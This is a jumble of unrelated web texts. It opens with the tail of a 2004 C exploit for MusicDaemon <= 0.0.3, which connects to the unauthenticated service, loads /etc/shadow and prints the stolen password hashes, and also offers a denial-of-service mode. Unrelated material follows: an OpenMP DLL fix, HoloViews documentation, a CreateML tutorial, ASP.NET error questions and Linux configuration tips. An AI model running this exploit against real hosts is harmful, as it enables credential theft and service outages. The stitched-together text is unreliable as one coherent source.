* root@vortex:~/test#
*
* Server Side View:
*
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p 1234
* Using configuration: ../musicd.conf
* [Mon May 17 05:26:07 2004] cmd_set() called
* Binding to port 5555.
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called
* Binding to port 1234.
* [Mon May 17 05:26:11 2004] New connection!
* [Mon May 17 05:26:11 2004] cmd_load() called
* [Mon May 17 05:26:13 2004] cmd_show() called
* [Mon May 17 05:26:20 2004] Client lost.
*
*
* As you can see, it simply makes a connection, sends the commands, and
* leaves. MusicDaemon doesn't even log that new connection's IPs that I
* know of. Works very well, eh? :)
*
* The first vulnerability is that there is no authentication at all. The
* second is that it will let you "LOAD" any file on the box if you have the
* correct privileges, and by default, as I said before, it runs as root,
* unless you change the configuration file to make it run as a different user.
*
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
* the contents of the actual file. You can substitute any file you want in
* for /etc/shadow; I just coded it to grab that one because it is such an
* important system file, if you know what I mean ;).
*
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST",
* it will crash the music daemon.
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(int argc, char *argv[]) {
    char buffer[16384];
    char *xpldata1 = "LOAD /etc/shadow\r\n";
    char *xpldata2 = "SHOWLIST\r\n";
    char *xpldata3 = "CLEAR\r\n";
    char *dosdata1 = "LOAD /bin/cat\r\n";
    char *dosdata2 = "SHOWLIST\r\n";
    char *dosdata3 = "CLEAR\r\n";
    int len1 = strlen(xpldata1);
    int len2 = strlen(xpldata2);
    int len3 = strlen(xpldata3);
    int len4 = strlen(dosdata1);
    int len5 = strlen(dosdata2);
    int len6 = strlen(dosdata3);

    if (argc != 4) {
        printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS");
        printf("\nDiscovered and Coded by: Tal0n 05-22-04\n");
        printf("\nUsage: %s <host> <port> <option>\n", argv[0]);
        printf("\nOptions:");
        printf("\n\t\tshadow - Steal /etc/shadow file");
        printf("\n\t\tdos - DoS Music Daemon\n\n");
        return 0;
    }

    printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow Stealer / DoS\n\n");

    int sock;
    struct sockaddr_in remote;
    remote.sin_family = AF_INET;
    remote.sin_port = htons(atoi(argv[2]));
    remote.sin_addr.s_addr = inet_addr(argv[1]);

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("\nError: Can't create socket!\n\n");
        return -1;
    }
    if (connect(sock, (struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) {
        printf("\nError: Can't connect to %s:%s!\n\n", argv[1], argv[2]);
        return -1;
    }
    printf("Connected to %s:%s...\n", argv[1], argv[2]);

    if (strcmp(argv[3], "dos") == 0) {
        printf("Sending DoS data...\n");
        send(sock, dosdata1, len4, 0);
        sleep(2);
        send(sock, dosdata2, len5, 0);
        sleep(2);
        send(sock, dosdata3, len6, 0);
        printf("\nTarget %s DoS'd!\n\n", argv[1]);
        return 0;
    }
    if (strcmp(argv[3], "shadow") == 0) {
        printf("Sending exploit data...\n");
        send(sock, xpldata1, len1, 0);
        sleep(2);
        send(sock, xpldata2, len2, 0);
        sleep(5);
        printf("Done! Grabbing /etc/shadow...\n");
        memset(buffer, 0, sizeof(buffer));
        read(sock, buffer, sizeof(buffer));
        sleep(2);
        printf("\n<*** /etc/shadow file from %s ***>\n\n", argv[1]);
        printf("%s", buffer);
        printf("\n<*** End /etc/shadow file ***>\n\n");
        send(sock, xpldata3, len3, 0);
        sleep(1);
        close(sock);
        return 0;
    }
    return 0;
}
ADDITIONAL INFORMATION
The information has been provided by Tal0n.
http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-08/0088.html
We make things faster...
If you've tried to build an OpenMP application and seen this error dialog pop-up: "This application has failed to start because vcompd.dll was not found." then you've come to the right place.
It turns out that due to vcomp(d).lib being a pure import lib it doesn't have a manifest in it. So to get the manifest for vcomp(d).dll we put it in omp.h. In fact if you look in omp.h, starting with this line, #if !defined(_OPENMP_NOFORCE_MANIFEST), you will see where we do the manifest generation.
This requires the programmer to include omp.h even in cases where they're only using OpenMP pragmas. That should only be five seconds' worth of work, although it was more than five seconds' worth of work to figure out what the problem was. Hopefully this blog post has all of the keywords one might search for if they run across this issue.
Solution to the message "This application has failed to start because vcompd.dll was not found. Re-installing the application may fix this problem." when creating openmp applications with Visual Studio 2005
Great!! It helped me very much.
I already got into trouble, thought visual studio's installation got corrupted.
Thanks for the solution to the problem.
Very helpful! Now if you could only help me solve my multi-threading issues. :-)
Me too, me too! This turned what would certainly be a few hours of work into a simple fix.
Hello, [visual studio 2008]
if you are using a configuration like an app with _DEBUG defined (a debug build) together with the Multithreaded DLL runtime (the release version of the runtime), you must include <omp.h> like this:
#undef _DEBUG
#include <omp.h>
#define _DEBUG
Thanks a lot, it was a great deal of help
Thanks for help!!!! Was starting to be pissed with it :D
I was having this problem even though I had included the #include <omp.h> as part of my headers. What fixed it was moving the omp include statement at the end of all my other includes. Before, it had been the first include.
http://blogs.msdn.com/kangsu/archive/2005/10/24/484462.aspx
Bars
Download this notebook from GitHub (right-click to download).
import numpy as np
import holoviews as hv
hv.extension('matplotlib')
The Bars Element uses bars to show discrete, numerical comparisons across categories. One axis of the chart shows the specific categories being compared and the other axis represents a continuous value.
Bars may also be stacked by supplying a second key dimension representing sub-categories. Therefore the Bars Element expects a tabular data format with one or two key dimensions and one value dimension. See the Tabular Datasets user guide for supported data formats, which include arrays, pandas dataframes and dictionaries of arrays.
data = [('one', 8), ('two', 10), ('three', 16), ('four', 8), ('five', 4), ('six', 1)]
bars = hv.Bars(data, hv.Dimension('Car occupants'), 'Count')
bars
You can 'slice' a Bars element by selecting categories as follows:
bars[['one', 'two', 'three']] + bars[['four', 'five', 'six']]
Bars support stacking just like the Area element, as well as grouping by a second key dimension. When declaring a second key dimension, Bars will visualize it as grouped bars by default; to activate stacking instead, set the stacked=True option:
from itertools import product
np.random.seed(3)
index, groups = ['A', 'B'], ['a', 'b']
keys = product(index, groups)
bars = hv.Bars([k + (np.random.rand() * 100.,) for k in keys], ['Index', 'Group'], 'Count')
grouped = bars.relabel('Grouped')
stacked = bars.relabel('Stacked')
grouped + stacked.opts(stacked=True)
For full documentation and the available style and plot options, use hv.help(hv.Bars).
https://holoviews.org/reference/elements/matplotlib/Bars.html
Thanks for submitting this feedback. The Microsoft.Owin package underwent some refactoring post-preview based on feedback. The class 'IntegratedPipelineExtensions', which contains the UseStageMarker() extension, was moved to the namespace Microsoft.Owin.Extensions based on feedback. The aspnet identity package (preview) - trying to use UseStageMarker() - has a dependency on the preview version of Microsoft.Owin.
To resolve this issue try one of the following:
1. Update all the packages including the *aspnet.Identity* packages – You will still have to fix up any template code changes made in RC by yourself.
2. [Recommended]: Use VS 2013 RC to create projects. This way you automatically get the template code changes made to accommodate the Katana changes, as well as the RC version of all packages.
After fixing all the references pointing to the right location, I can't repro the issue.
Visual Studio will fall back the reference path to the bin folder if it can find a DLL with the same name. I guess the issue is that your bin folder has some old version files and VS can still compile with them. Please manually remove the bin folder in your web project before your next try.
https://connect.microsoft.com/VisualStudio/feedback/details/801735/could-not-load-type-owin-integratedpipelineextensions-from-assembly-microsoft-owin-version-2-0-0-0-culture-neutral-publickeytoken-31bf3856ad364e35
Training deep learning models is known to be a time-consuming and technically involved task. But if you want to create deep learning models for Apple devices, it is super easy now with the new CreateML framework introduced at WWDC 2018.
You do not have to be a Machine Learning expert to train and make your own deep learning based image classifier or an object detector. In this tutorial, we will see how to make a custom multi-class image classifier using CreateML in Xcode in minutes in macOS.
We need macOS Mojave and above (10.14+) and Xcode 10.0+. If you would like to deploy the model to an iOS app, you would need iOS 12.0+.
Benefits of using CreateML
There are several benefits of using CreateML for image classification and object detection tasks.
- Ease of use: Apple has made it very easy for developers without machine learning experience to create models.
- Speed: CreateML uses hardware acceleration to significantly speed up training and inference times. You can train a dataset of a few hundred images in seconds and a few thousand images in minutes rather than multiple hours.
- Size: When you train a deep learning model on a GPU, you either use a network like Mobilenet or you use a larger network and apply pruning and quantization to reduce their size (MB) and make them run fast on mobile devices. These models can be a few megabytes to sometimes a hundred megabytes. That’s not cool if you want to use it in your mobile application. CreateML takes care of all those details under the hood and produces a model that is just a few kilobytes in size!
- Train once, use on all Apple devices: The model trained using CreateML can be integrated into iOS, macOS, tvOS and watchOS using CoreML.
Transfer Learning
You may have heard that a Neural Network is data hungry — it takes thousands, if not millions of data points to train one. How come CreateML requires only a few hundred images? The short answer is Transfer Learning.
In Transfer Learning, we use the architecture and weights of a pre-trained model which is usually trained on a large dataset for a different task. With this pre-trained model as the base, in Transfer Learning we change only the final output layers to suit the task at hand. We do not have to retrain the entire network for our own classification problem. This vastly speeds up the training process and also requires a much smaller dataset. For example, we could use a pre-trained ResNet model that has already been trained on a large dataset like ImageNet for 1000 categories using a dataset of more than a million images.
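The idea can be sketched in a few lines of Python. This is purely illustrative: CreateML's actual extractor and classifier are Apple internals, so here a fixed random projection stands in for the frozen pre-trained network, and only a trivial "head" (a nearest-class-mean classifier) is fit on top of the frozen features.

```python
import numpy as np

rng = np.random.default_rng(0)

# Stand-in for a frozen pre-trained feature extractor: a fixed random
# projection plus a ReLU. In real transfer learning this would be a deep
# network (e.g. scenePrint or ResNet) whose weights are left untouched.
W_frozen = rng.normal(size=(64, 8))

def extract_features(images):
    return np.maximum(images @ W_frozen, 0.0)  # weights are never updated

# Only the "head" is fit. Here it is the simplest possible head: one
# prototype (mean feature vector) per class, i.e. nearest-class-mean.
def train_head(feats, labels):
    return feats[labels == 0].mean(axis=0), feats[labels == 1].mean(axis=0)

def predict(feats, head):
    mu0, mu1 = head
    d0 = ((feats - mu0) ** 2).sum(axis=1)
    d1 = ((feats - mu1) ** 2).sum(axis=1)
    return (d1 < d0).astype(int)

# Toy "images": class 1 has a shifted mean, standing in for real photos.
labels = (rng.random(200) < 0.5).astype(int)
images = rng.normal(size=(200, 64)) + 3.0 * labels[:, None]

feats = extract_features(images)
head = train_head(feats, labels)
accuracy = (predict(feats, head) == labels).mean()
```

Because only the tiny head is trained, a couple of hundred examples suffice, which is exactly why CreateML gets away with small datasets.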
Apple uses this concept of transfer learning to let its users make custom deep learning based image classifiers.
Scene Print : Apple’s tiny pre-trained model
A pre-trained ResNet model — a popular architecture — is about 90 MB when exported as a CoreML model file. Another popular model for mobile devices, called SqueezeNet, is around 5 MB.
In comparison, Apple’s own pre-trained model called scenePrint is just around 40KB!
How is that possible?
Psst… Apple is cheating! Well sorta. Remember, it owns the operating systems macOS, iOS, tvOS and watchOS, and the pre-trained model is bundled with the OS. Only the weights of the last layer need to be bundled with your app and that is why the size is tiny.
What about the accuracy?
The performance is slightly inferior to ResNet and slightly better than SqueezeNet. More importantly, it is better than human level accuracy! Apple provides a comparison of the same here.
Does it use the GPU?
This Vision model is already optimized for the hardware in Apple’s devices and uses GPU acceleration. It is available in macOS 10.14+ and Xcode 10.0+ SDKs.
Training a Custom Image Classifier using CreateML
Let’s see how to use the new scene print feature extractor model and train our own classifier in a MacBook Pro.
The experiments below are based on my mid-2015 MacBook Pro which has
- Processor: 2.5 GHz Intel Core i7 processor.
- GPU: AMD Radeon R9 M370X with 2048 MB VRAM.
You can see the GPU being used using the Activity monitor during training and inference.
That feels so good! Usually, because newer Macs do not have an NVIDIA GPU, we never train deep learning models on a Mac. But with CreateML, there is no need for a remote machine or cloud computing to do the heavy lifting GPU work to do some basic deep learning experiments!
The network in the model takes in images of size 299×299. So it's advisable to use images of a size larger than that; otherwise the image would be upscaled before being fed to the network, which might lead to lower accuracy.
Dataset Preparation
In this post, we will show you how to build a multi-class classifier that can classify 10 different kinds of animals.
We will use the CalTech256 dataset. The dataset has 30,607 images categorized into 256 different labeled classes along with another ‘clutter’ class.
Training the whole dataset will take around 3 hours, so we will work on a subset of the dataset containing 10 animals – bear, chimp, giraffe, gorilla, llama, ostrich, porcupine, skunk, triceratops and zebra.
The number of images in these folders varies from 81(for skunk) to 212(for gorilla). We use the first 60 images in each of these categories for training and the rest for testing in our experiments below.
If you want to replicate the experiments, please follow the steps below
- Download the CalTech256 dataset.
- Create two directories with the names train and test.
- Copy the first 60 images of bear to the directory train/bear.
- Copy the remaining images for bear (i.e. the ones not included in the training set) to the directory test/bear. Repeat this for every animal.
Build and Analyze an Image Classifier in XCode
Now that our dataset is ready, we can follow the steps below to build an image classifier.
Step 1 : Open the Classifier Builder
Open Xcode (10.0+) and open a new playground using File->New->Playground. While doing so, choose a macOS Blank template.
Make sure the Assistant Editor is open in the right. Type the following in the main playground editor and hit Shift+Enter to run it.
import CreateMLUI

let builder = MLImageClassifierBuilder()
builder.showInLiveView()
When this executes, the image classifier builder shows up in the right in the Assistant Editor.
Step 2 : Training
Click on the drop-down next to the ImageClassifier, and set the Max Iterations to 20. For smaller datasets, this might lead to overfitting, but for the size we are working on now, it should be fine. Then drag and drop the training folder train to the area labeled as ‘Drop Images to Begin Training’ under the ImageClassifier.
You will see that it would start training. It first extracts the feature vectors for all the images. This is the most time-consuming part of this process and it does use the GPU. The extracted vectors are then used in the training iterations to predict the class probability for each image. As the training is carried out, it prints out the time spent on training, the training accuracy and the validation accuracy after each iteration.
Step 3 : Testing
Next, we need to check the accuracy on our test images. Drag and drop the test image folder into the area labeled ‘Drop Images to Begin Testing’ in the Assistant Editor.
CreateML then extracts the feature vector for each of the training images and classifies them.
As we can see above, it processed 509 images in 1m 36s !
The final evaluation accuracy across all the test instances of all the 10 classes is 82% as shown in the Live view in the Assistant editor. It also shows the predicted and true class belonging to each test instance. You can scroll down the test instances to see the output for each of them.
Confusion Matrix
Confusion Matrix gives an idea of the performance of the classification model over various classes. An entry (i, j) in the confusion matrix shows how many instances of class i are predicted as belonging to class j. Ideally, all the non-zero numbers should be along the diagonal of the matrix if there is zero error. Below is the confusion matrix in our evaluation.
As we can see the biggest confusion is classifying the gorilla as the chimp, which is kind of reasonable here as they are the closest animals in terms of appearance. Some chimps are also classified as gorillas, but there are more gorillas in the test set than chimps.
The next big one in the confusion matrix is that some of the bears are classified as chimps. This could be an indication that the classifier needs more images of bears.
Precision and Recall
Precision for a class is the fraction of instances correctly predicted as belonging to the class over all the instances predicted as belonging to the class. If we see below, it is 100% for the llama and bear categories. So each test instance predicted to be llama is actually a llama, and each instance predicted as a bear is a bear too.
Recall is the fraction of the number of instances correctly predicted as belonging to the class over all the instances actually belonging to the class. In our example, we got a 100% recall for multiple categories – giraffe, skunk, triceratops and zebra. So all the test instances belonging to these categories got classified correctly.
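Both metrics fall straight out of the confusion matrix. A small Python sketch (the two-class counts below are a made-up toy example, not our CreateML results):

```python
import numpy as np

def precision_recall(confusion):
    """Per-class precision and recall from a confusion matrix where
    confusion[i, j] counts instances of true class i predicted as class j."""
    confusion = np.asarray(confusion, dtype=float)
    true_positives = np.diag(confusion)
    precision = true_positives / confusion.sum(axis=0)  # column sums: predicted as j
    recall = true_positives / confusion.sum(axis=1)     # row sums: actually i
    return precision, recall

# Toy two-class example: 9 of 10 "bears" correct, 8 of 10 "chimps" correct.
cm = [[9, 1],
      [2, 8]]
precision, recall = precision_recall(cm)
# precision -> [9/11, 8/9], recall -> [0.9, 0.8]
```

This makes the 100% figures in the text concrete: a class column with no off-diagonal entries gives precision 1.0, and a class row with none gives recall 1.0.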
Inference by Users
Apple’s CoreML framework lets the users do on-device inference using the models created using CreateML. This helps retain user’s privacy and does not need any internet connection as needed by the apps using web-based inference.
We will not go into the details of creating an app for inference by a user in this post, but Apple provides very good documentation of the same for building an iOS app using its Vision and CoreML models with sample code here.
You could also build an iOS app doing real-time image classification with ARKit. Its sample code is here.
One thing to keep in mind while building your own app with a custom model is that the scenePrint model works best if the source of your training data matches the source of the images you want to classify. For example, if your app classifies images captured with an iPhone camera, train your model using images captured the same way, whenever possible.
References
Griffin, G. Holub, AD. Perona, P. The Caltech 256. Caltech Technical Report.
Introducing Create ML by Apple at WWDC 2018
Image Classifier User Guide
Subscribe & Download Code
If you liked this article, please subscribe to our newsletter. You will also receive a free Computer Vision Resource Guide. In our newsletter, we share OpenCV tutorials and examples written in C++/Python, and Computer Vision and Machine Learning algorithms and news.
https://learnopencv.com/how-to-train-a-deep-learning-based-image-classifier-in-macos/
Hi
I tried to add some Zip functionality to my website. I use DotNetZip from CodePlex. It works without any problem on my development machine (Windows XP). So I uploaded the files to the web server. Now I am getting the following error.
Compiler Error Message: CS0246: The type or namespace name 'Ionic' could not be found (are you missing a using directive or an assembly reference?)
How can I debug it? Please help me.
I keep getting the error: Error message: CS0101: The namespace '<global namespace>' already contains a definition for 'checkvalue'.
Then, I rename the Inherits from the @page directive in both the .aspx and .aspx.cs pages and it works!
My website has only 2 pages, and both use the same class (same class name, exactly same syntax) but it has been copied and pasted and the 2 aspx pages (and aspx.cs pages) are not referencing each other.
In other words, both aspx.cs pages (called page1.aspx.cs and page2.aspx.cs) has the class
public class CheckValue {
    // content
    return true;
}
Both the aspx pages reference the 'inherits' files seperately:
<%@ Page Language="C#" CodeFile="page1.aspx.cs" Inherits="_1" %>
and my code behind
public partial class _1 : System.Web.UI.Page
and for my second page
<%@ Page Language="C#" CodeFile="page2.aspx.cs" Inherits="_2" %>
and my code behind
public partial class _2 : System.Web.UI.Page
I don't use the .resx file.
Why does this error happen some times, and not other times?
Dave
I would like to create a class that extends my ErrorData class. I have not done this in a while, and when I try class ErrorDataASPX : ExceptionHandler.ErrorData and build, I get the message:
Error 1 The type or namespace name 'ErrorData' does not exist in the namespace 'ExceptionHandler' (are you missing an assembly reference?) C:\ExceptionHandling\ExceptionHandler\ErrorDataASPX.cs 9 44 ExceptionHandler
namespace ExceptionHandler {
    class ErrorDataASPX : ExceptionHandler.ErrorData

namespace ExceptionHandling {
    using System;
    using System.Globalization;
    using System.Text;
    using System.Web;

    /// <summary>
    /// Contains information about an error.
    /// </summary>
    public class ErrorData {
I am trying to execute an application definition file through a web part. The filter has to be done based on UserID, which is of type Int64.
But it gives an error: "A Wildcard filter requires a TypeDescriptor that resolves to a String".
Hence I tried to change the filter descriptor to type Comparison and exactMatch; even then it did not work.
Following is the app def file
<?
<
http://www.dotnetspark.com/links/41935-error-2-type-namespace-definition-end-of-file.aspx
Manki's Linux Tips, by Muthu Kannan: some tiny nifty ways I have configured my Ubuntu machine to improve my productivity.

Ubuntu on Lenovo P50: using NVidia proprietary drivers (2016-04-05)

I managed to dual boot Ubuntu (Kubuntu 14.04, actually) on my shiny new Lenovo P50. With the default Nouveau driver, the experience left a lot to be desired. Graphics performance was slow and suspend-resume worked only once. For every boot, suspend will work once. After that, suspending will do nothing; the machine will just stay on forever.

I followed the prompts to install the proprietary drivers, which didn't really help. After installing the drivers, X would simply not start. So I had to revert to the open source Nouveau driver. (You'd do this by getting a root shell from recovery boot and purging all Nvidia packages.)

Today, as a wild guess, I decided to install the proprietary driver and disable the Intel GPU altogether. (You'd do this by choosing the Discrete Only option in the BIOS display settings. The default is Hybrid, which keeps both the Intel and NVidia GPUs active.) Maybe that could help, I thought, and to my surprise it did work. Graphics is now fast, and suspend-resume works too. Initial display of LightDM and logging into KDE are a bit slow, but everything else is nice and snappy.

Apple WWDC keynote video in Linux

Make your browser lie to apple.com that you're using a Windows machine. I made my Chrome use the UserAgent string of Firefox on Windows. The video player loaded. Ubuntu seems to have a QuickTime plugin installed, so the video just played.

To change the UserAgent of Chrome (i.e. to make Chrome pretend it's Firefox running on Windows), open Menu > Tools > Developer Tools. Click on the Gear icon at the bottom-right corner and select the UserAgent checkbox.

GTK mouse cursor in KDE?

If you have upgraded to Kubuntu 12.10, you'd notice that KDM has been replaced with LightDM. LightDM looks pretty, but somehow doesn't play well with KDE. One annoying issue I have noticed is that GTK applications run in KDE use the GTK mouse cursor under certain circumstances. When Chrome shows a menu, the mouse cursor changes to a GTK one and it looks jarring. Turns out, there's a fix for that.

1. Install the LightDM KDE greeter:

sudo apt-get install lightdm-kde-greeter

2. Make LightDM use the KDE greeter, and all will be well again. To do that, edit the file /etc/lightdm/lightdm.conf and change the value of greeter-session. The file will look something like this after the change:

[SeatDefaults]
greeter-session=lightdm-kde-greeter
user-session=ubuntu

3. Save the file and test your changes by running LightDM in test mode:

lightdm --test-mode

If LightDM doesn't open correctly, check if you have made any typing errors in the config file. If you cannot fix the issue, just restore the file as it was before you edited it; you'll still have the ugly mouse cursor issue, but at least your computer will continue to work.

Windows (aka Super) key to Escape

Did you know I have mapped Caps Lock on my computer to open a new browser tab? Only today I figured my Vim sessions can be a lot better if I mapped the 'Windows' key (aka Super key) to Escape. It can be done by adding a single line to your ~/.Xmodmap file:

! Map left Windows key to Escape.
keysym Super_L = Escape

(Okay, that was two lines, but a little comment in obscure configuration files can be very helpful.)

Also, if you don't feel like logging out and logging back in after these changes (or if you want to try the change before touching your config file), you can run this on a terminal to have the keybinding take effect immediately:

xmodmap -e 'keysym Super_L = Escape'

Fonts in KDE

If you're a KDE user and have always envied Gnome for its font rendering (especially with fonts like Ubuntu and Ubuntu Mono), read on.

All you need to do is select 'Enabled' for System Settings > Application Appearance > Fonts > Use anti-aliasing. Click on the Configure button and set Hinting style to 'Slight'. If you like ClearType-style font rendering, enable subpixel rendering too.

Any program that's opened after this change will use the new font rendering settings. So you may want to restart your open apps or log out and log back in.

Ubuntu menu proxy when not using Unity

Does seeing messages like this on your terminal annoy you?

** (gvim:8016): WARNING **: Unable to create Ubuntu Menu Proxy: Timeout was reached

It sure does annoy me. Turns out, it's because the app you're running is trying to connect its menus to Unity's "global menu" (or whatever that's called). The way to fix this problem would be to disable the Unity menu proxy when you're not using Unity. Add this to your shell's startup script (.bashrc, .zshrc, etc.):

if [[ $DESKTOP_SESSION != "ubuntu" && $DESKTOP_SESSION != "ubuntu-2d" ]]
then
    export UBUNTU_MENUPROXY=0
fi

zsh prompt string PS1

Every Unix user with a blog has a post about it: how they have configured their PS1 so their command prompt is almost a mini dashboard that shows everything they'd need to know. I am no exception. Even if this post doesn't really help others, bragging is gratifying, so I'd go on and show how awesome my PS1 is :)

I have been using zsh for a while now, and I am quite happy with it. I'm a sucker for colours and I was annoyed that I couldn't take full advantage of my 256 colour terminal because I just didn't know how to. So I searched the web and found two good pages. Combined with some manual-reading I had done, I cooked up my shiny new PS1: [...]

[...] Kubuntu on it. I almost never used Windows, but I had kept it on the disk anyway. Last week I thought of upgrading to an SSD, and bought a 240GB SSD.
This post is to document how I copied over the Windows installation and recovery partition to the SSD before swapping the disks.<br /><br />I connected the SSD to my computer using an USB interface and ran <code>sudo fdisk -l</code> to see the partition tables of both disks. /></code></pre><code>/dev/sda</code> is the original hard disk that came with the laptop, and <code>/dev/sdb</code>, which is empty currently, is the new SSD. I have to clone the first 3 partitions (<code>/dev/sda1</code>, <code>/dev/sda2</code>, and <code>/dev/sda3</code>) bit-by-bit to retain all the preinstalled stuff — this includes Windows 7 installation and the recovery partition. Replicating the Windows partitions is the tricky part, so this post will describe that in detail. Copying data from Linux partitions can be done with a simple <code><a href=''>rsync</a></code>.<br /><br />The first step is to create partitions on the new disk that resemble the old disk. I followed the <a href=''>fdisk guide of TLDP</a> and created the first 3 partitions. Now <code>fdisk -l</code> shows this configuration: />/dev/sdb1 2048 31459327 15728640 27 Hidden NTFS WinRE<br />/dev/sdb2 * 31459328 31664127 102400 7 HPFS/NTFS/exFAT<br />/dev/sdb3 31664128 232622079 100478976 7 HPFS/NTFS/exFAT<br /></code></pre>The partitions in the new disk are of the same size and same type as in the old one. <code>/dev/sdb2</code> is bootable as is <code>/dev/sda2</code>. (It won’t boot yet though, since the disk has no OS yet.) Now to copy the data bits over. I first unmounted all three partitions. This is critical because changing data underneath when it’s being copied over is a darn good recipe for data corruption.<br /><br /><code>dd</code> is the low-level data copying utility I used to clone the partitions. Copying the data over was as simple as running these commands one by one. (Swapping <code>if</code> and <code>of</code> can result in wiping out all data from the old partition. 
<code>dd</code> cannot even know if you’re passing wrong arguments to it.)<br /><pre><code>% sudo dd if=/dev/sda1 of=/dev/sdb1 conv=notrunc<br />% sudo dd if=/dev/sda2 of=/dev/sdb2 conv=notrunc<br />% sudo dd if=/dev/sda3 of=/dev/sdb3 conv=notrunc</code></pre><br />Copying can be painfully slow since we are moving hundreds of GBs around. Blog O’ Matty has a post that shows how to <a href=''>find status of a running <code>dd</code> command</a>. Essentially you’d send <code>SIGUSR1</code> signal to the <code>dd</code> process and it’d print the current status of the transfer. One of the commenters suggests running <code>sudo pkill -SIGUSR1 dd</code> so that you don’t have to think about process IDs.<br /><br />Once this was done, I installed Kubuntu on the SSD using the standard installation process, and everything went just fine. Windows doesn’t boot probably because it thinks mine is a pirated copy. (Shows an error saying some ‘important’ hardware has gone missing.) But I can boot into the recovery partition, so I can restore factory settings to get Windows running again when I want it.<br /><br />I restored all my installed software from the <a href=''>package selection list</a> I had already generated. That’s it... the computer is exactly like it was before with all my programs and configuration.<img src="" height="1" width="1" alt=""/>Muthu Kannan stack size of Linux processes to reduce swappingSince upgrading to Kubuntu 11.10, my laptop has been slow. Slow because it’s been accessing the hard disk a lot. I incidentally opened <a href=''>system monitor</a> yesterday and found that more than 1GB of <a href=''>swapping space</a> was in use although only about 1.1GB of the total 2GB RAM was in use. That doesn’t sound right. The computer shouldn’t swap when about half of the RAM is unused.<br /><br />My friend <a href=''>Abhay</a> had once <a href=''>told me about thread stack size</a> configuration of Linux (Unix?) processes. 
This configuration specifies how much RAM is given to each thread for its stack. I ran the following command to see how much was the current stack size:<br /><pre><code>% ulimit -s<br />8192</code></pre>That’s 8192KB allocated for each thread. With some Googling around I figured this was a huge number. <a href=''>Windows allocates only 1MB</a> by default. For a machine that’s low on RAM like mine, 8MB for stack is ludicrous. I decided to make it 2MB instead. Unsurprisingly, I wasn’t the first to try to do something like this; a <a href=''>thread on LinuxQuestions.org</a> explained that I can edit <a href=''><code>/etc/security/limits.conf</code></a> to set the default size.<br /><br />I added the following lines to my <code>/etc/security/limits.conf</code>:<br /><pre><code>* soft stack 2048<br />* hard stack 2048</code></pre>(Only <code>root</code> can modify this file; you’ll need to use <code>sudo</code>.) To apply the configuration changes I restarted the machine. After restarting, now my machine is using about 1.4GB of RAM and about 80MB of swap. No need to mention, everything is fast as it used be.<img src="" height="1" width="1" alt=""/>Muthu Kannan new browser tab when Caps Lock key is pressedAfter using a <a href="">Chromebook</a> for a while, I realised how useful mapping Caps Lock key to opening a new browser tab can be. Of course, it’s possible to set up key bindings to achieve this in Linux.<br /><br />First, I set up <code>.Xmodmap</code> so that pressing Caps Lock is interpreted as the same as pressing Calculator key on my multimedia keyboard. I chose Calculator key because it doesn’t currently do anything, and I don’t use it at all. I added the following lines to my <code>~/.Xmodmap</code> file.<br /><pre><code>remove Lock = Caps_Lock<br />keysym Caps_Lock = XF86Calculator</code></pre>Now, pressing Caps Lock would be the same as pressing Calculator key.<br /><br />We need to make pressing Calculator key send <kbd>Ctrl+T</kbd> keystrokes instead. 
This can be done in KDE by defining a new global shortcut. In KDE 4.7, this is done by navigating to <em>System Settings > Shortcuts and Gestures > Custom Shortcuts</em>. Define a new <em>Command/URL</em> global shortcut. Use <kbd>Caps Lock</kbd> as the trigger shortcut (it would show as <em>Calculator</em> in the UI). Specify <pre><code>/usr/bin/xte "keydown Control_L" "key t" "keyup Control_L"</code></pre>as the command to run. (You’d have to install <a href=''>xte</a> if it isn’t already installed on your machine.) That’s it; now pressing <kbd>Caps Lock</kbd> anywhere within KDE would send <kbd>Ctrl+T</kbd> keystrokes instead.<br /><br />A few tips:<br /><ul><li>You can use <code>xmodmap -pk</code> command to see the list of all available keys.</li><li>Be sure to select a key that’s actually present on your keyboard; my laptop does not have a calculator key, so I am using the battery key instead. Any key that's present in the keyboard but not currently in use would do.</li><li>After you have modified your <code>~/.Xmodmap</code>, you’ll have to log out and log back in for the mappings to apply. Alternatively, you can apply the configuration to your current session from the command line, e.g. by running <code>xmodmap -e "remove Lock = Caps_Lock"</code>.</li></ul><img src="" height="1" width="1" alt=""/>Muthu Kannan syntax highlightingI like colours. I have aliased all frequently used commands like <code>ls</code>, <code>grep</code>, etc. by adding flags to show colours in the output. I have set my <code>PS1</code> in such a way that the prompt is in a different colour. It makes it easy for me to see where the prompt ends and the command starts. When I heard about <a href=''>fish</a>!<br /><br />All you have to do is download the code from <a href=''>zsh-syntax-highlighting</a> project and “source” it in your <code>.zshrc</code>. But I wasn’t happy with their defaults. 
By default this script underlines path names, but I hate underlining because it makes text less readable. I also didn’t like their choice of blue colour for <a href=''>globs</a>. On my black terminal, blue is hardly readable. Customising the formatting was easy too; I only had to change the value of a variable. This is what my .zshrc has now, and syntax highlighting works like a charm.<br /><pre><code>source ~/dload/src/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh<br />ZSH_HIGHLIGHT_STYLES[globbing]='fg=yellow'<br />ZSH_HIGHLIGHT_STYLES[path]='bold'<br /></code></pre>You can find the list of different syntax highlighting options in <a href=''>this file</a>.<img src="" height="1" width="1" alt=""/>Muthu Kannan scripts when any individual command failsLet’s say you have a script that builds a project, runs all tests, and pushes the binary to a staging/production server. If the build fails or a test fails you’d want the script to stop immediately. Pushing a binary that failed some tests is obviously wrong. You can check for a command’s return value using <code>if</code> and terminate your script. But doing that for every command in the script would make your script less readable and more prone to bugs.<br /><br />Shells provide a clean solution for this use case: you can set a script-level option to stop the script execution if any command you invoke from the script exits with a non-zero status. 
